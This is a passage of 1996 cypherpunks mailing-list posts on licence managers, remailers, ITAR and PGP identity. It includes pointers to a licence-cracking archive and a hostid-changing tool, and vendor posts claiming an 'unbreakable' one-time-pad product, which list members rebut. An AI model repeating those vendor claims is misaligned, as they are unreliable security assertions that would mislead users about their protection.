organize, and discussions and debates will probably be more productive
than they are now.  The pressures of crypto anarchy might not be strong
enough to liberate China overnight, but they will exert a powerful and
steady force towards liberalization.  Once Chineese society has coexisted
with a vibrant black information market for a decade or two, making 
things legal will probably seem sensible to most people -- no one will 
expect the sky to fall if people are allowed to speak their minds.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mch@squirrel.com (Mark C. Henderson)
Date: Tue, 20 Feb 1996 08:10:35 +0800
To: "David J. Bianco" <cypherpunks@toad.com
Subject: Re: Encryption in software licenses...
Message-ID: <199602192246.OAA01658@squirrel.com>
MIME-Version: 1.0
Content-Type: text/plain


On Feb 19, 14:25, "David J. Bianco" wrote:
} Subject: Encryption in software licenses...
} Does anyone have a pointer to any good discussions on how to build programs
} with encrypted license keys?  ftp.csua.berkeley.edu used to have such a file
} (/pub/cypherpunks/cryptanalysis/license.asc.gz), but the archive hasn't
} been accessible for a few days.  Although I remember this to be mostly about 
} how to crack such schemes, it has lots of useful information about how they
} are designed in the first place.

license.asc.gz and some other related stuff is available on
ftp://utopia.hacktic.nl/pub/replay/pub/cracking

This all goes back to the familiar lesson for all of us reading this 
newsgroup, the easy way to break most practical applications of 
cryptography is to find a way to "work around" or "subvert" the 
cryptosystem being used. 

Consider two popular UNIX licence managers

FlexLM - uses weak cryptography by default to produce licence keys, 
although vendors can plug in their own 

Elan (V4.1 and above) - can use DES or a 5-rotor enigma. Both of these
are better cryptosystems than that used by FlexLM.

Now, does anyone here think that Elan is significantly harder to 
crack than FlexLM because it uses better cryptography than FlexLM? I 
hope not. 

The Elan marketing literature makes the use of DES sound like a big 
advantage. But, it doesn't make any difference to the cracker. 

There is actually some good content in the marketing goo at
http://www.globetrotter.com
http://www.elan.com
if you're willing to sift through it.

Writing and debugging a floating network licence manager which is 
reliable and multiplatform is hard. For a real challenge, try and put 
in some sort of redundancy (multiple hosts), and keep everything 
sane. The danger for a software vendor is that they end up with a 
good software product, which has a licence manager that makes it 
unreliable and causes problems for customers. I've seen this happen a 
few times. In this senario, customers often abandon the product and 
stop paying for support and upgrades, which are a significant part of 
the income of a software vendor. If word gets around (and it will), 
that your licence manager is buggy will adversely effect new sales. 

I'm a sysadmin, and every time a licence manager craps out and needs 
to be restarted, users can't use their software until they can get a 
hold of me. For some products (I'm not going to mention names), this 
happens on a more or less weekly basis. Licence manager malfunctions 
are relatively rare with products like FlexLM and Elan. The 
home-grown licence managers tend to be a real problem from a systems
administration point of view. 

Here are my free (and worth every penny you paid) recommendations
to a software vendor considering some sort of software based licence 
management scheme.

1. Trust your customers (best choice!!!) and concentrate your efforts 
on producing good quality software. This way you'll get more 
customers, etc. Crackers will be able to get around any sort of 
licence-management scheme anyway (just check out Usenet newsgroups 
devoted to binary mods to unlock applications and distributing keys 
for applications) 

2. Buy an off-the-shelf licence manager which has a good 
track-record. It will already have the worst bugs worked out. Better 
to spend time working on improving the software you are trying to 
licence. 

3. If you must roll-your-own, avoid trying to write a 
network-floating licence scheme. These are harder to write and have a 
lot more potential to turn an otherwise good product into a worthless 
piece of crap. 

4. If you must roll-your-own network-floating licence manager, be 
prepared to expend a lot of time and effort debugging and testing. Be 
sure to build in some sort of redundancy

I mention FlexLM and Elan because I know a fair bit about them. This isn't
an endorsement, etc.

-- 
Mark Henderson -- markh@wimsey.bc.ca, henderso@netcom.com, mch@squirrel.com
PGP 1024/C58015E3 fingerprint=21 F6 AF 2B 6A 8A 0B E1 A1 2A 2A 06 4A D5 92 46
cryptography archive maintainer - ftp://ftp.wimsey.com/pub/crypto/README.html
ftp://ftp.wimsey.com/pub/crypto/sun-stuff/change-sun-hostid-1.6.3.tar.gz




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: IPG Sales <ipgsales@cyberstation.net>
Date: Tue, 20 Feb 1996 06:10:23 +0800
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <199602190942.EAA30761@thor.cs.umass.edu>
Message-ID: <Pine.BSD/.3.91.960219132531.301A-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain


Mon Mar 19,1996

Obviously you want to criticise without investigation. He who knows all, 
   knows little, or nothing accoring to Einstein.

On Mon, 19 Feb 1996 lmccarth@cs.umass.edu wrote:

> "Internet.Privacy.Guaranteed (IPG)" writes:
> >	   CRE Transforms,
> >          trademark IPG, are the only acknowledged unbreakable method
> >          of so transforming digitized information. There are no
> >          passwords, encryption keys, or anything like that to conjure
> >          up, remember, and perhaps forget. 
> 
> Neat trick, unless they're using biometrics, which doesn't appear to be the
> case :}
It uses one time pads - yes - but true OTPs, not random number generators 
with a key like the POTP people. The mere fact that POTP sells the entire 
package, should tell you something. For long Messages, the basic kernel 
of our system is also a random number generator, but the source key, 5600 bits,
is a true random one time pad generated from a hardware source. 

>From that 5600 bits, a combination of a prime number numbers, picked from 
a large random table, by 512 of the random bits, ie 64 large prime 
numbers, and the other random bits are used to generate the random numbers 
used. This in effect creates a humoungous cycled encryption wheel 
system, with over 10 to the 2300th power possibilities before repeats, 
similar to engima but more like the most secured electronic encryption 
systems used prior to the advent of computers.
> 
> [...]
> >                      Don't Waste your time !
> 
> I think they just said it best themselves, but I'll comment a bit more....
> 
You obviously are too informed - since you already know everything, 
perhaps there is nothing more for you to learn so you are right, don't 
waste you time, since you already know, But others, less informed, might 
discover that they do nnot know everything
> [...]
> >          Every informed expert of the
> >          technology will confirm, without reservation, that the IPG
> >          system is not breakable, as many already have!  
> 
> All under NDA, I suppose. Note that they don't even name an "informed expert of
> the technology"; at least the POTP people gave some names.
We did refer people to Paul Leyland as you note in your next paragrapgh - 
Unlike PGP, and other RSA systems, DES, and even POTP, the PCX Nvelopes 
system is mathematically unbreakable - if you labor uner the delusion 
that the PGP protects your privacy be our guest. Ask yourself " Why are 
Freeh, Gore and all the others not screaming more than they are about 
RSA systems, DES systems and so forth? They are talking about 
interceting 1 in 100 messages n urban areas, are they doing it 
because they want to waste their time?
> [...]
> >          A fully
> >          operational integrated multi-user system costs approximately
> >          $140.00 per user, ready to load and go, with thousands, or
> >          millions of Nvelopes and Nvelopeners. IPG also offers full
> >          turnkey leases at $15.00 per user, per network, per
> >          month, which includes all software, upgrades, administration,
> >          and unlimited Nvelopes and Nvelopeners.
> >
> >          As a reference to its unbreakability, we refer you to an
> >          article by Paul Leyland on Internet at:
> > 
> >              http://dcs.ex.ac.uk/~aba/otp.html
> 
> Clearly they (claim to) offer some sort of system using One Time Pads.
> Notice the price quote of "$15.00 per user, per network, per month" including
> "unlimited Nvelopes and Nvelopeners". I suspect this means that they're
> basically selling chunks of (pseudo- ?)random data for as much as $15/person 
> each month!  I guess it's nice work if you can get it. At that price, one
> would hope that they're at least generating truly random bits from a hardware
> source. But their skimpy details on their proprietary processes don't
> inspire confidence....
Every message is encrypted with a separate Nvelope, and as indicated in 
our site, nver repeated. If the message is less than 5600 bits, it is a 
true random one time pad, from hardware sources - if longer, the one time 
pad becomes a random number generator as partially explained previously.
Each nvelope, hardware one time pad, an ADC LOB system,  is used once and 
only once, the system absolutely precludes reuse.  The $15.00 per moth 
keeps all users supplied with the necessary one time pads, which in the 
case of high volume business users might be a few hundred a day, a stock 
broker, anb accountant, auditor, an attorney or the like.
 > >          For more information visit our Web Site at:
> > 
> >              http://www.netprivacy.com/ipg
> 
> In case you didn't get enough hyperbole from the press release, they have
> extra helpings on the Web. This site has numerous pages containing precious
> little real information. I found a few tidbits in unlikely places, though:
> 
> In http://www.netprivacy.com/ipg/mlmplan.html, which incidentally promises
> that they "can help you to make some big bucks through the PCX Nvelopes
> Multi - Level - Marketing Plan", it says:
> 
> > With our manufacturing process it is relatively easy for us
> > to manufacture a ready to go system, for 25 users, or for
> > 2,500 users.  All the user has to do is to prepare a
> > DIR.LST, a Directory Listing of the users. We use that as
> > the template and manufacture the system. 
> 
> This is actually a little scary. According to one of their other web pages, 
> the DIR.LST file is a numbered list of user names and email addresses. So it
> appears that a customer hands over a list of names and addresses, and IPG
> assigns a set of one-time pads (or something) to each pair of users on the 
> list. (Holy combinatorial explosion.) And now IPG knows the one-time pads that
> will be used between any pair of email addresses on the list it has !  
> The EES is starting to look attractive by comparison. 
> 

Obviously you again already know everything, so there is no need to 
try to explain it to you, but others might be interested. As to 
combinatorial explosion, it really ius not as ad as people might think!
A user does not jave to keep all the combinations, only the ones paired 
with, thus in a thousand user system, there is only a need for 999 paired 
Nvelope and Nvelopeners, and some of those will little usage. We keep 10 
Nvelopes/Nvelopeners for each pair, 20 in duplex, and each is 700 bytes.
Thus in a 1000 user system, about 7.2 MB would be required to handle all 
the one taime pads, a lot os space but not unmageable, As Nvelopes are 
used, they are replensihed accordingly to a heuristic algorithm built 
into the system. 
  
> > It becomes a load
> > and go installation at each of the user sites. 
> 
> Gee, why are we all so worried about key management ?  It's just a load and
> go installation at each of the user sites !  ;)
> 

That is precisely why PCX Nvelopes is such an extraordinary system. 
That is the beauty of PCX Nvelopes, it lifts that  burden from the 
user, eliminates it entirely. You may have worried about key 
management, but with our system, you will not have to do so in the 
future. The system itself, manages all the OTPs, you do not have to do 
anything but use the system. Key management is the problem with all existing 
systems, but it is no problem at all with the PCX Nvelopes system, as you would 
see if you looked at the system, instead, of talking about something 
when you have no idea at all of what it is about. The first set of keys 
must be sent by a secure source, US mail, FED EX, or whatever, but
thereafter, all updates can be accomodated over Internet. 


 > > We will even prepare, or help prepare, the DIR.LST for 
users. > >
> > While we have the software and manufacturing facility to do
> > that quickly, it is not easily transportable, to say the
> > least, and certain aspects of it, we consider highly proprietary.
> 
> "not easily transportable, to say the least" ???  
> Any ideas to what this might refer ?
The combinatorial problem that you referred to previously, would indeed 
generate almost 500,000 pair sets, which we call packets. What is the 
best way to generate those 499,500 sets? 999 We can automatically generate 
them, and all the software that goes with them on 1000 sets of 6 diskettes
each, each of which goes through a separte verification process, and certification 
process, larger systems are delivered in parts, two diskettes 
direct, and the others over internet. 

> 
> OK, I saved (IMHO) the best for last. I suppose this could be taken as a claim
> about their proprietary, immobile RNG methods:
> (from http://www.netprivacy.com/ipg/comp.html)
> 
> >         How do we Achieve such High Standards?
> >                  First Class Quality Control!
> >
> > We achieve unusually high standards of excellence because
> > of the manufacturing process. Over 30%, sometimes as high as 
> > 50% or more of our Nvelopes, Nvelopeners, are discarded 
> > because they cannot meet our rigid standards. Also our 
> > Nvelopes and Nvelopeners are subjected to a battery of 
> > performance tests to insure that when used, they will meet the 
> > high standards that you would expect.
Every onetime pad is subjected to analysis at the bit level, character 
level, couplet level, triplet level, and set level, 5600 bits. As you 
might, but probably do not know, all hardware generation of OTP's are 
irregular, otherwise they are not random. Thus at times, a hardware 
source, such as ADC LOB system, can generate nonrandom data, unless 
this is checked, it can destroyed the integrity of your system. At all 
levels, we check standard deviation, chi Square, Delta IC, and other 
statistical tests. Moreover, we check sets of packet, at the 2, 4, 8, 
16, 32, 64, 128, 256, 512, 1024, 2048, 4096, 8192, 16384 etal. Our 
packets are random, and you can take that to the bank.   

> 
> <sigh> It's a jungle out there....
> 
> -Lewis	"You're always disappointed, nothing seems to keep you high -- drive 
> 	your bargains, push your papers, win your medals, fuck your strangers;
> 	don't it leave you on the empty side ?"  (Joni Mitchell, 1972)
> 
 <sigh> - Einstein - He who thinks that he knows everything, knows 
                     nothing.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruce@aracnet.com>
Date: Tue, 20 Feb 1996 08:27:20 +0800
To: cypherpunks@toad.com
Subject: Re: NET_run
Message-ID: <2.2.32.19960219225440.006e9bb0@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


>   2-19-96. NYT:
>
>   "In this new game, you'll never play with a full deck."
>
>      Sometime next month a game will be played on the
>      Internet, challenging surfers to leap between sites,
>      solving puzzles and cracking codes that will give them
>      access to secret data hidden behind firewalls and
>      software barriers. 

Okay, I just checked with Wizards of the Coast, and here's the story.

Netrunner is indeed a card game. As part of the intro publicity, some demo
games will be run on the Web. (No, no info about that at the moment.) The
rest is the intersection of overenthusiastic publicity folks and clueless
reporters. "Go, marketing department, go" were the exact words of my friend.

However, he also says that the game is an exceedingly cool one, and that
those of you who like the collectable card games should check it out.

-- 
Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com (David Mandl)
Date: Tue, 20 Feb 1996 05:30:52 +0800
To: Bruce Baugh <bruce@aracnet.com>
Subject: Re: Remailers not heard from; info?
Message-ID: <v01530500ad4e8ad00b96@[166.84.250.21]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:17 AM 2/19/96, Bruce Baugh wrote:
>And as long as I'm asking questions :-), I see that some remailers
>(hfinney@shell.portal.com, hal@alumni.caltech.edu, homer@rahul.net) preserve
>subject lines while others do not. Is this a readily settable option? If so,
>I'd like to commend it to other remailer operators.

Even more important, I believe that many (most?) remailers still leave
signatures in by default.  This is extremely dangerous, and inconvenient
too, since some mail programs make you jump through hoops to turn off the
signature feature.  I think it'd be a good idea if ALL remailers omitted
them by default and, if anything, allowed the sender to optionally leave
his or her signature in (though I imagine that'd be a rare request).

I know that there's no sure-fire way to find signatures that aren't
prefixed by, say "--", but that's better than nothing.

   --Dave.

--
Dave Mandl
dmandl@panix.com
http://www.wfmu.org/~davem






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 20 Feb 1996 09:55:00 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Easy Nuclear Detonator
Message-ID: <m0tof8q-0008xmC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:14 PM 2/19/96 EDT, E. ALLEN SMITH wrote:
>	I would have appreciated it if you'd sent this to me privately, or at
>least didn't enclose my message to you (which was sent in private email). Among
>other reasons, it is rather off-topic (unless one wants to count it among bomb
>information available on the net).
>	-Allen

Uh, okay, sorry.  See, I wrote the response for you, and at the last minute
I realized that I might as well include it to the list as well.   Yes, it is
"off topic" but I thought it was interesting reading anyway.  In addition, I
gave the list 12+ hours of "warning" and asked if anybody objected...  All I
got was an "attaboy" from Dr. Dmitri Vulis.

As for the inclusion of your private note:  sorry again.  But at the time,
it just didn't occur to me that you'd object to this.  "Nettiquette" is new
to me.

Jim Bell

jimbell@pacifier.com.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Tue, 20 Feb 1996 00:52:05 +0800
To: cypherpunks@toad.com
Subject: Re: Piracy Bests ITAR
Message-ID: <199602191456.AA00738@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


Alan Horowitz sez:

: > From: Anonymous <nobody@REPLAY.COM>
: > Some economists have made a good case that slack
: > enforcement of such rules may sometimes do little harm.
: > Local firms benefit by acquiring pirated technology more
: > cheaply than the real thing; consumers acquire affordable
: > high-tech products and close copies of branded goods.

:    Yes, when Mr Anon travels to a beach in Jamaica or in Mombasa, he 
: shouldn't complain when the taxi driver takes him, not to his requested 
: destination, buit some dark alley where Mr Anon gets clunked over the 
: head and his wallet removed. The locals need the money more than Mr 
: rich-tourist-on-vacation Anon.  They're only doing socialist justice, 
: after all.

: Property is property. Theft is theft.

Then the question arises is software property ..

If I steal your money, you don't have it any more;
if I copy your software, you still have it so one 
can't simply conclude that copying is theft.

Besides copyright law, patent law et al. are all rip offs
designed to suck money out of Citizen-Units. I you create
a new and improved methode to do accounting your idea will 
not be protected, also concepts and principles are unprotected.

Intelectual Property Law is only designed to protect the
investor, publishers/authors wanted copyright laws, the industrial
age brought us patent laws, bio-genetics are patenting 'dna strings', 
the computer age brought us patenting of mathematic principles,
and soon databases will be protected.

Copying software isn't theft, copying software is a vote against rip offs, 
copying software is the first step in liberating the Citizen-Unit !

!noitulover
--

" The way to combat noxious ideas is with other ideas.  
  The way to combat falsehoods is with truth. " 

	-- Justice William O. Douglas, 1958




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>
Date: Tue, 20 Feb 1996 06:44:53 +0800
To: cypherpunks@toad.com
Subject: ITAR Amended to Allow Personal Use Exemption
Message-ID: <9602192117.AA08428@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


>From the most recent RISKS:

>RISKS-LIST: Risks-Forum Digest  Friday 16 February 1996  Volume 17 : Issue 75
...

Date: Fri, 16 Feb 96 14:04:39 EST
From: denning@cs.cosc.georgetown.edu (Dorothy Denning)
Subject: ITAR Amended to Allow Personal Use Exemption 

Today's Federal Register contains a notice from the Department of State,
Bureau of Political Military Affairs, announcing final rule of an amendment
to the International Traffic in Arms Regulation (ITAR) allowing U.S. persons
to temporarily export cryptographic products for personal use without the
need for an export license.  The product must not be intended for copying,
demonstration, marketing, sale, re-export, or transfer of ownership or
control.  It must remain in the possession of the exporting person, which
includes being locked in a hotel room or safe.  While in transit, it must be
with the person's accompanying baggage.  Exports to certain countries are
prohibited -- currently Cuba, Iran, Iraq, Libya, North Korea, Sudan, and
Syria.  The exporter must maintain records of each temporary export for five
years.  See Federal Register, Vol. 61, No. 33, Friday, February 16, 1996,
Public Notice 2294, pp. 6111-6113.

Dorothy Denning 

   [This will probably become known as the Matt Blaze exemption.
   See Matt's ``My life as an international arms courier" in RISKS-16.73,
   6 January 1995.  PGN]   

------------------------------

Date: Fri, 16 Feb 1996 13:18:02 -0500 (EST)
From: Educom <educom@elanor.oit.unc.edu>
Subject: Spreading the Word (Edupage, 15 February 1996)

*The Washington Post* has reported that a Maryland family received a number
of threatening calls after a University of Maryland student used the
Internet to circulate a hearsay allegation that a daughter in the family was
being mistreated by her mother.  Posting his message on Internet newsgroups
concerned with child welfare, psychology, left-wing politics, and civil
liberties, the student urged people to call the mother "at home and tell her
you are disgusted and you demand that she stops."  The student claims: "You
should be able to write what you want on the Internet, whether it's true or
not."  (*Houston Chronicle*, 14 Feb 1996, 2A)

------------------------------
_______________________
Regards,               "Men are not against you; they are merely for 
			themselves." -Gene Fowler
Joseph Reagle          http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu         0C 69 D4 E8 F2 70 24 33  B4 5E 5E EC 35 E6 FB 88





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Tue, 20 Feb 1996 08:04:48 +0800
To: dmandl@panix.com (David Mandl)
Subject: Re: Remailers not heard from; info?
In-Reply-To: <v01530500ad4e8ad00b96@[166.84.250.21]>
Message-ID: <199602192241.QAA28619@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> Even more important, I believe that many (most?) remailers still leave
> signatures in by default.  This is extremely dangerous, and inconvenient
> too, since some mail programs make you jump through hoops to turn off the
> signature feature.  I think it'd be a good idea if ALL remailers omitted
> them by default and, if anything, allowed the sender to optionally leave
> his or her signature in (though I imagine that'd be a rare request).

Couple of problems:

o   Some of us -- like me -- like to use double dashes to separate text. 
The penet remailer used to drive me crazy, it always stripped off the
bottom of my posts.

o   Someone using a nym might want to use a sig.

o   Very few mailers make people use sigs -- usually just the ones on 
bbs's.  If people want to use crummy broken mailers, they ought to be 
willing to take the consequences.

o   Depending on a remailer to strip your sig doesn't give you security wrt
the remailer operator.  If you use encryption, the last remailer on the
chain will see your sig, which will be in the innermost encrypted block. 
That defeats the purpose of chaining.  If you're not using encryption, you 
don't have any security anyay.

A better solution might be a specialized remailer that strips sigs for 
people who need the service.  People who need sig stripping could put 
that remailer in the chain, and the rest of us could handle our sigs on 
our own.

I think we're moving more towards systems that require remailer clients 
(like mixmaster) anyway.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Tue, 20 Feb 1996 07:01:19 +0800
To: ipgsales@cyberstation.net (IPG Sales)
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <Pine.BSD/.3.91.960219132531.301A-100000@citrine.cyberstation.net>
Message-ID: <199602192141.QAA14697@homeport.org>
MIME-Version: 1.0
Content-Type: text


Since you're convinced that your system can stand scrutiny, why not
post a URL for a paper describing the algorithims, key management,
etc, of your system.  What you've posted here is unparseable, with the
exception of some nonsense, which parses to `We know enough to be
dangerous.'

Adam


IPG Sales wrote:

| >From that 5600 bits, a combination of a prime number numbers, picked from 
| a large random table, by 512 of the random bits, ie 64 large prime 
| numbers, and the other random bits are used to generate the random numbers 
| used. This in effect creates a humoungous cycled encryption wheel 
| system, with over 10 to the 2300th power possibilities before repeats, 
| similar to engima but more like the most secured electronic encryption 
| systems used prior to the advent of computers.

|  <sigh> - Einstein - He who thinks that he knows everything, knows 
|                      nothing.
| 


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jiri@baum.com.au>
Date: Mon, 19 Feb 1996 14:25:28 +0800
To: bryce@colorado.edu
Subject: Re: An entity calling itself Kilroy was probably here (was: Web Page Authentication (was: Anti-Nazi Authentication) )
Message-ID: <199602190556.QAA21493@mail.mel.aone.net.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Bryce and Cypherpunks,

#ifdef CDA

In case I ever want to visit the US, here's a warning I've swiped
off the top of some poetry:

                    Leganto, se vi estas pruda
                    Kaj na`uzas vin la amo nuda,
                    Se indignigas vin la bolo
                    De la temperamento suda,
                    Se ^genas vian delikaton
                    La grimaceto am-aluda,
                    Pripensu bone anta`u lego:
                    Tute ne estas mi altruda,
                    For^jetu min, retiru vin
                    Al via dika ^sel' testuda.

                    Leganto! Jen la lasta voko!
                    Tuj sekvos jam dan^gera loko!
                    For^jetu min! Beda`urus mi,
                    Se vin mortigus nervo-^soko!

                    -------------------------------

                    Leganto! Mi avertas due!
                    Pripensu, ^cu vi legos plue!
                    Pilate levas mi la manojn,
                    Se mi efikos misinflue.
                    Neniu vin devigas legi,
                    Anstata`u indigni^gi brue,
                    For^jetu min, for^jetu min,
                    Ankora`u estas ne malfrue.

                           -- from: Peter Peneter, Sekretaj Sonetoj

OK, so maybe my post is nowhere near as good as said poetry, but
better safe than sorry :-)

#endif


Somebody wants us to think that Bryce Wilcox wrote:

...
>This quotes some mail sent directly to me by (probably) an 
>entity calling itself "Jiri Baum".  I apologize in advance
>if said probable entity is offended at my broadcasting his
...

No problem; being unsubscribed at the moment, could you please
forward to me any replies? Thanks!

...
>  +---+---- Bryce
>  |   |
>+---+------ Probably an entity calling itself Jiri
>| | | |
>v v v v
>> > > > An entity calling itself Jiri Baum 
>> > > > <jirib@sweeney.cs.monash.edu.au> probably wrote:
>> > > ...
>> > > 
>> > > Probably? Didn't I sign it? :-)
...
>> I guess it depends on whether we are talking about "Jiri Baum
wrote"
>> (about which you'd be perfectly right) or "An entity calling
itself
>> Jiri Baum wrote". Witness:
...
>Well now let's say that an active attacker had supplanted
>your public key with his own.  He is not, really, an entity
>who calls himself "Jiri".  I mean, sure by using a public 
>key which he controls and which has "Jiri" on it he is 
>calling himself "Jiri", but he rarely if ever actually talks
>to people and says things which those people associate with 
>the name "Jiri".
...

Hold on - yes she does! That's the point of a MITM: she wants people
to associate things she says with the name "Jiri". (I'll use a female
MIMT to distinguish her from the real McCoy.)

The question asked by PGP when key-signing is: "Based on your own
direct first-hand knowledge, are you absolutely certain that you are
prepared to solemnly certify that the above public key actually
belongs to the user specified by the above user ID?". 

There is no exception for self-signing. The MIMT controlling the
public key would be prepared to solemnly certify that the key belongs
to the entity called "Jiri", in other words, that she is "Jiri".

...
>More significantly, he never thinks of
>*himself* as "Jiri".  So in this most fundamental sense he
>does not "call himself Jiri".
...

Well, she may not *think* of herself as "Jiri", but she is prepared
to swear (solemnly certify) that she is. Isn't that "calling herself
Jiri"?

...
>*You* are the entity who calls yourself Jiri, and I can only
>say that you "probably" wrote the above because I'm not sure
>if you actually control the public key associated with your 
>name.
...

Well, I control *a* key associated with my name (undisputed, last I
checked the keyservers). There may be other persons using the name
"Jiri Baum" (though I don't know of any except pre-WW2).

...
>mouth and so forth?  Maybe I should say "An entity who calls
>itself 'Jiri Baum' and is more or less unaware of any nym
>collision regarding that nym...".
...

Hmm, "John Smith" is going to have trouble signing that one... many
people have nym collisions they are aware of, without any malicious
intent (eg son named after father).

...
>Yeah, that one seems bulletproof...
...

Except you don't know whether I'm aware of any nym collision. You
could say "An entity who calls itself 'Jiri Baum' and claims to be
more or less unaware of any nym collision regarding that nym..." but
then you'll have to ask each key-holder whether or not he is aware of
such a collision.

...
>> True - I guess that's another use - a time-stamping service could
>> sign any page that asks for it. Time to whip up yet another CGI
...
>Wei Dai <weidai@eskimo.com> and Matthew Richardson 
><matthew@itconsult.co.uk> have both done this.  I suspect
...

But I thought there were only e-mail timestampers, not web-page
timestampers... (ie, a form would ask for a URL and output just a
detached signature).

...
>I myself use Usenet and mailing lists as a sort of poor
>man's time-stamping service.  If I invent an idea or some
...

I suppose that'll probably work (especially if the idea is worth
saving); a thing I've heard of in the traditional world is to put it
in an envelope, send it to yourself registered and keep the sealed
envelope; but I'm not a lawyer so I wouldn't have a clue to what
extent it works... Besides, it's off-net.


Please Cc any replies to me as I'm off-cypherpunks at present.


ObConspiracyTheory: CoS & CDA ?


ObCDA:
        Jes, ^caste, sen malpuro de pasio
        Mi vin ornamis per admira kron'...
        Kio okazis do en subkonscio,

        Ke, ne timante brilon de l'salon',
        Levante kapon sin anoncis io:
        Fripona bub' en mia pantalon'.

                           -- ibid.

(I'm *sure* that's indecent somewhere.)


Hope I'm making sense, and sorry about the excessive head and tail
matter...

Jiri

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAgUBMSggaRQ9DWdGOhTVAQGJdwP+IxJ3AxuNUOcDpppoKqtH3ovGeqDcupGu
f6KzVxsRCxEESvwwo9s9Chg50+OqAwjHiloiLJY1CCKe1cjFU4/oZi6lBmHqCbrb
Zui1caNRMYUHCNpAc6QBrDc4DmZ6y1ymg+lNjzvq2fNAQxOMPRwBZx/h3w8Jftze
c7sWILGw6bI=
=nGwO
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: IPG Sales <ipgsales@cyberstation.net>
Date: Tue, 20 Feb 1996 08:53:26 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <199602192141.QAA14697@homeport.org>
Message-ID: <Pine.BSD/.3.91.960219170127.5326A-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 19 Feb 1996, Adam Shostack wrote:

> Since you're convinced that your system can stand scrutiny, why not
> post a URL for a paper describing the algorithims, key management,
> etc, of your system.  What you've posted here is unparseable, with the
> exception of some nonsense, which parses to `We know enough to be
> dangerous.'
> 
> Adam
> 
> 
> IPG Sales wrote:
> 
> | >From that 5600 bits, a combination of a prime number numbers, picked from 
> | a large random table, by 512 of the random bits, ie 64 large prime 
> | numbers, and the other random bits are used to generate the random numbers 
> | used. This in effect creates a humoungous cycled encryption wheel 
> | system, with over 10 to the 2300th power possibilities before repeats, 
> | similar to engima but more like the most secured electronic encryption 
> | systems used prior to the advent of computers.
> 
> |  <sigh> - Einstein - He who thinks that he knows everything, knows 
> |                      nothing.
> | 
> 
> 
> -- 
> "It is seldom that liberty of any kind is lost all at once."
> 					               -Hume
> 
> 
> 
> 
> 
We are not currently revealing all the details of our system because of 
patents in process, and other relat6ed matters. We are offering the 
software. You should be able to readily decompile it and determine the 
algorithms used andf how they are used to generate random number sequences 
for very long files.  For short messages, a true OTP is used directly. 

If you are aware of encrtypting technology, you recognize that hardware 
prime number cycle wheels for the basis of some of the most secured 
hardware systems employed for encryption. We simply expand that technogy 
using software to set an intial setting, an adder, and a limit for 64 
such wheels, using large random prime numbers for each of those settings. 
The total number of possibilities is over 10 to the 1690th power and can 
be much larger. 

Thus we can eliminate the need to have the length of the OTP to be equal 
to the length of the file - if you do not belive that it works, try it 
and see - it takes inly a few hours to set such a trial up. We generated 
over 790 gigabytes of charcaters, on multiple backups, and tested. Our 
standard deviations, chi squares, Delta ICs for bits, characters, sets, 
and the entire set were random. The sets are random, and you can take 
that to the bank. 

Someone, will decompile it and discover that it is truly random, at least 
from the practical usage basis. But we need that time to file patents, 
cvopyrights and the like. 

The IPG system solves the key management problem and produces a truly 
unbreakabkle system. We make no apologies for not currently revealing all 
of the methodologies andf algorithms, but they will be revealed with 
time, by us or others, and you will discover that it is indeed a simple, 
easy to use, easy to install, truly unbreakable system.

"Unless we know, we do not experience by talking," Plato
  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Tue, 20 Feb 1996 08:53:08 +0800
To: cypherpunks@toad.com
Subject: Re: Some thoughts on the Chinese Net
In-Reply-To: <2.2.32.19960219221817.006ce4a8@mail.aracnet.com>
Message-ID: <199602192342.RAA28868@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> I'd like to agree, but I'm afraid I can't. Notice that many years of
> widespread use of currently illegal drugs in the US has not translated into
> widespread willingness to say that the drugs should be legal. 

This is a a bad example:  drugs are a destructive, negative thing, and 
practical experience with them makes people wary.  Freedom, on the other 
hand, it a good thing and experience with it will bear that out.

Having said that, there is a lot of support for legal and non-violent ways
to distribute drugs.  I would be surprised if it doesn't happen in 20 or
30 years.

> Nor has the
> experience of decades of black markets turned into widespread Russian
> willingness to allow a lot more freedom: what they call "profiteering" and
